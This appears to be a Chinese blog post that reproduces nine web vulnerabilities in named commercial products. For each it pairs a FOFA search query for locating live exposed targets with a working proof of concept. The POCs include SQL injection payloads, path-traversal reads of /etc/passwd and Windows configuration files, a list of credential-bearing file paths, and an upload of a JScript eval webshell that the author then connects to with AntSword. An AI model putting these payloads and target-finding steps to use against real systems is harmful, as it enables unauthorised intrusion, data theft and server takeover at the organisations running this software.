首页 > 其他分享 >护网漏洞复现(三)

护网漏洞复现(三)

时间:2024-09-04 09:35:48浏览次数:8  
标签:.. xxx 漏洞 xx 复现 fofa 护网 页面

Mtab书签导航程序LinkStoregetlcon存在SQL注入漏洞

描述:Mtab书签导航程序 LinkStore/getIcon 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限

fofa语法:title="Mtab书签"

POC:

POST /LinkStore/getIcon HTTP/2

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

Content-Type: application/json

Content-Length: 11

{"url":"*"}

漏洞复现:

fofa中搜索资产,共有215条数据匹配

屏幕上有字  描述已自动生成

以下是页面访问特征

电脑萤幕画面  描述已自动生成

访问http://xxx.xxx.xxx.xxx/LinkStore/getlcon

图形用户界面, 应用程序  描述已自动生成

当前页面抓包,修改GET请求为POST请求

文本  描述已自动生成

将数据包放入到sqlmap中进行测试,漏洞存在

文本  描述已自动生成

用友CRM客户关系管理help.php存在任意文件读取漏洞

描述:用友U8 CRM是一款针对代理销售服务行业设计的管理软件,它集客户关系管理(CRM)、呼叫中心和自动化(OA)核心应用于一体,提供前端营销、后端业务处理及员工管理的一体化解决方案。该系统的help.php文件中接口存在任意文件读取漏洞,攻击者在未登录的情况下即可进行漏洞利用。

fofa语法:body="用友 U8CRM"

POC:http://xxx.xxx.xxx.xxx/pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9

漏洞复现:

fofa中所搜资产,共有1314条数据匹配

图形用户界面, 应用程序  描述已自动生成

以下为登录页面以及页面特征

图形用户界面, 应用程序, Teams  描述已自动生成

在url后面添加Payload

文本  中度可信度描述已自动生成

在这个也买你查找error_log可以看到此系统的安装路径,如果是C盘,可以查看更多敏感信息

图片包含 背景图案  描述已自动生成

URL中key的内容是经过base64加密的,原本为以下内容

a:3:{i:0;s:24:"/../../../apache/php.ini";i:1;s:1:"1";i:2;s:1:"2";}

如果直接在URL中拼接以上内容是无法进行文件读取的

以下是一些常用的敏感windows文件路径

C:\boot.ini //查看系统版本

C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件

C:\Windows\repair\sam //存储系统初次安装的密码

C:\Program Files\mysql\my.ini //Mysql配置

C:\Program Files\mysql\data\mysql\user.MYD //Mysql root

C:\Windows\php.ini //php配置信息

C:\Windows\my.ini //Mysql配置信息

C:\Windows\win.ini //Windows系统的一个基本系统配置文件

WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞

描述:WookTeam /api/users/serchinfo接口存在SQL注入漏洞,未经身份验证的恶意攻击者可以利用SQL注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)等,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限

fofa语法:title="Wookteam"

POC:

http://xxx.xxx.xxx.xxx/api/users/searchinfo?where[username]=1') UNION ALL SELECT NULL,CONCAT(0x71627a7a71,0x6a4e626c59524676474f4d446d666c50475265514a7879586f6b4271584365526678617575704f72,0x7162707671),NULL,NULL,NULL#

漏洞复现:

fofa中搜索资产,共有673条数据匹配

图形用户界面  描述已自动生成

以下为登录页面以及页面特征

图形用户界面  描述已自动生成

访问/api/users/searchinfo接口,会显示当前系统中存在哪些用户

文本  描述已自动生成

构造Payload,在url后面添加单引号发现报错了,很明显存在SQL注入漏洞

图形用户界面, 应用程序, Word  描述已自动生成

将URL放入到sqlmap中进行测试

文本  描述已自动生成

智慧校园(安校易)管理系统存在文件上传漏洞

描述:智慧校园(安校易—)管理系统/Tool/ReceiveClassVideo.ashx接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导致服务器权限被控制。

fofa语法:title="智慧综合管理平台登入"

POC:

POST /Tool/ReceiveClassVideo.ashx?file_tmid=798&orgid=1&classID=1 HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

Content-Length: 374

Accept: application/json, text/javascript, /; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,

Connection: close

Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl

X-Requested-With: XMLHttpRequest

Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl

Content-Disposition: form-data; name="File1"; filename="1.aspx"

Content-Type: image/jpeg

<%@ Page Language="Jscript" validateRequest="false" %>

<%

function xxxx(str)

{

​ return eval(str,"unsafe");

}

%>

<%var a = Request.Item["pass"];%>

<%var b = xxxx(a);%>

<%Response.Write(b);%>

------dqdaieopnozbkapjacdbdthlvtlyl--

漏洞复现:

fofa搜索资产,共有134条数据匹配

图形用户界面  描述已自动生成

以下为登陆页面以及页面特征

图形用户界面, 网站  描述已自动生成

当前页面抓包构造数据包

图形用户界面, 文本, 应用程序  描述已自动生成

返回内容报错可以不用管,但是我尝试了其他的系统只有报“保存班级视频表失败”的错误才成功

使用蚁剑进行连接

图形用户界面, 应用程序  描述已自动生成

连接成功后目标不存在域环境

图形用户界面  描述已自动生成

泛微E-office 10 schema_mysql接口敏感信息泄露漏洞

描述:泛微E-Office 10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。该系统的schema_mysql接口存在敏感信息泄露漏洞。

fofa语法:body="eoffice_loading_tip" && body="eoffice10"

POC:http://xxx.xxx.xxx.xxx/eoffice10/empty_scene/db/schema_mysql.sql

漏洞复现:

fofa搜索资产,共有4868条数据匹配

电脑的屏幕截图  描述已自动生成

以下为登陆页面以及页面特征

建筑的摆设布局  描述已自动生成

当前页面抓包构造Payload

图形用户界面, 文本, 应用程序  描述已自动生成

AVCON-系统管理平台download.action存在任意文件读取漏洞

描述:AVCON-系统管理平台download.action存在任意文件读取漏洞,攻击者可通过该漏洞读取配置文件信息,造成信息泄露漏洞。

fofa语法:title="AVCON-系统管理平台"

POC:http://xxx.xxx.xxx.xxx/download.action?filename=../../../../../../../../etc/passwd

漏洞复现:

fofa搜索资产,共有50条资产匹配

背景图案  中度可信度描述已自动生成

以下为登录页面以及页面特征

图形用户界面  描述已自动生成

当前页面抓包构造payload

文本  描述已自动生成

图形用户界面, 文本  描述已自动生成

智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞

描述:智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。该系统SRM2.0 runtimeLog/download接口存在任意文件读取漏洞,未经身份验证的远程攻击者可以通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)等,导致网站处于极度不安全状态。

fofa语法:title=="SRM 2.0"

POC:http://xx.xx.xx.xx/adpweb/static/..;/a/sys/runtimeLog/download?path=c:\windows\win.ini

漏洞复现:

fofa搜索资产,共有744条数据匹配图形用户界面, 应用程序  描述已自动生成以下是登陆页面以及页面特征

电脑萤幕画面  描述已自动生成

当前页面抓包,构造payload

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

科荣AIO管理系统endTime参数存在SQL注入漏洞

描述:科荣AIO endTime接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(如:管理员后台密码、站点用户个人信息)之外,甚至在高权限的情况下可以向服务器中写入木马,进一步获取服务器系统权限。

fofa语法:body="changeAccount('8000')"

POC:http://xx.xx.xx.xx/moffice?op=showWorkPlanList&type=1&beginTime=1&endTime=1*&sid=1

漏洞复现:

fofa搜索资产,共有1611条数据匹配屏幕上有字  描述已自动生成

以下为登录页面以及页面特征

图形用户界面  描述已自动生成

构造payload访问

img

从返回结果看是存在查询操作,可能与数据库有交互

放入到sqlmap中进行测试

文本  描述已自动生成

安美数字酒店宽带运营系统weather.php任意文件读取漏洞

描述:安美数字酒店宽带运营胸痛weather.php接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件,导致网站处于极度不安全状态。

fofa语法:app="安美数字-酒店宽带运营系统"

POC:http://xx.xx.xx.xx/user/weather.php?Lang=../../../etc/passwd

漏洞复现:

fofa搜索资产,共有19条数据匹配

电脑萤幕画面  描述已自动生成

以下为登录页面以及页面特征

图形用户界面, 应用程序  描述已自动生成

构造payload拼接到url后面

img

图形用户界面, 文本, 应用程序  描述已自动生成

标签:..,xxx,漏洞,xx,复现,fofa,护网,页面
From: https://www.cnblogs.com/LeouMaster/p/18395857

相关文章

  • 护网漏洞复现
    金程云OAUploadFile存在任意文件上传漏洞描述:金程云OAUploadFile存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。fofa语法:body="images/yipeoplehover.png"POC:POST/OA/api/2.0/Common/AttachFi......
  • 春秋云镜-RCE靶场漏洞复现
    CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行......
  • Pikachu文件包含漏洞(本地和远程)
    一、本地文件包含打开靶场,选择一个查看读取一个本地文件查看二、远程文件包含在云服务器创建一个txt文件写入<?phpfputs(fopen("shell.php","w"),'<?phpeval($_POST["cmd"]);?>')?>在本机上查看,会生成一个6.php,使用蚁剑连接查看......
  • 应用程序报错漏洞修复
    漏洞描述错误页面由服务器产生400、403、404、500等错误时,返回详细错误信息。报错信息中可能会包含服务器代码信息、服务器版本信息、模板类型、数据库连接信息、SQL语句或者敏感文件的路径。修复修改nginx配置#其他配置...server{#其他配置...#指定400......
  • 文件包含PHP伪协议利用方法 本地复现
    环境配置步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include步骤二:创建123.php文件输入一句话木马步骤三:创建1.phpless-1 file://协议123.php?cmd=file://D:\phpstudy_pro\WWW\1.phpless-2 php://filter协......
  • pikachu文件包含漏洞靶场
    Fileinclusion(local)创建1.php步骤一:选择一个球员提交../../../../1.phpFileInclusion(remote)(远程文件包含)步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include;步骤二:选择球员步骤三:宝塔公网上创建一个6.txt文......
  • 【SCI复现】基于纳什博弈和ADMM的多微网主体能源共享研究(Matlab代码实现)
    ......
  • 【太阳能学报EI复现】基于粒子群优化算法的风-水电联合优化运行分析(Matlab代码实现)
    ......
  • pikachu文件包含漏洞靶场攻略
    1.Fileinclusion(local)(本地文件包含)步骤一:选择一个球员提交步骤二:filename后面输入../../../../shw.php访问php文件2.FileInclusion(remote)(远程文件包含)步骤一:修改配置远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on//默认打开Allow_url_include=on/......
  • 蜂信物联 FastBee 开源物联网平台 download 任意文件读取漏洞复现
    1产品简介蜂信物联(FastBee)开源物联网平台是一个专为物联网应用设计的综合性平台,它集成了硬件接入、数据管理、应用开发等一系列功能,为用户提供了一个完整、便捷的物联网解决方案。平台以其简单易用、功能强大、高度可扩展和安全性高的特点,为物联网应用的发展提供了有力支持......